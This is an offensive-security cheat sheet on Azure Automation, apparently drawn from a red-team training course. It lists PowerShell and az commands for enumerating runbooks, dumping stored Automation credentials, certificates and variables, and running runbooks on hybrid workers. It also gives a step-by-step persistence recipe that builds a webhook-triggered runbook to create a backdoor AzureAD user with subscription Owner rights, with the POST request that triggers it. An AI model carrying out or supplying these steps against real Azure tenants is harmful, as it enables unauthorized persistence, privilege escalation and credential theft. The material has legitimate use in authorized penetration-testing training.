Azure Services - Runbook and Automation

Runbook

Runbook must be SAVED and PUBLISHED before running it.

List the Runbooks

Get-AzAutomationAccount | Get-AzAutomationRunbook

Create a Runbook

• Check user right for automation

  az extension add --upgrade -n automation
  az automation account list # if it doesn't return anything the user is not a part of an Automation group
  az ad signed-in-user list-owned-objects
  

• Add the user to the "Automation" group: Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose
• Get the role of a user on the Automation account: Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>. NOTE: Contributor or higher privileges accounts can create and execute Runbooks
• List hybrid workers: Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
• Create a Powershell Runbook: Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
• Publish the Runbook: Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
• Start the Runbook: Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Automation Account

List Automation Accounts

Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.

Get-AzAutomationAccount

Get Automation Credentials

Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationVariable

Persistence via Automation Accounts

• Create a new Automation Account
  • "Create Azure Run As account": Yes
• Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
  • Sample runbook https://github.com/NetSPI/MicroBurst
  • Publish the runbook
  • Add a webhook to the runbook
• Add the AzureAD module to the Automation account
  • Update the Azure Automation Modules
• Assign "User Administrator" and "Subscription Owner" rights to the automation account

• Trigger the webhook with a post request to create the new user

  $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
  $AccountInfo  = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
  $body = ConvertTo-Json -InputObject $AccountInfo
  $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
  

Desired State Configuration

List the DSC

Get-AzAutomationAccount | Get-AzAutomationDscConfiguration

Export the configuration

$DSCName = ${dscToExport}
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug

References

• Training - Attacking and Defending Azure Lab - Altered Security

Share this content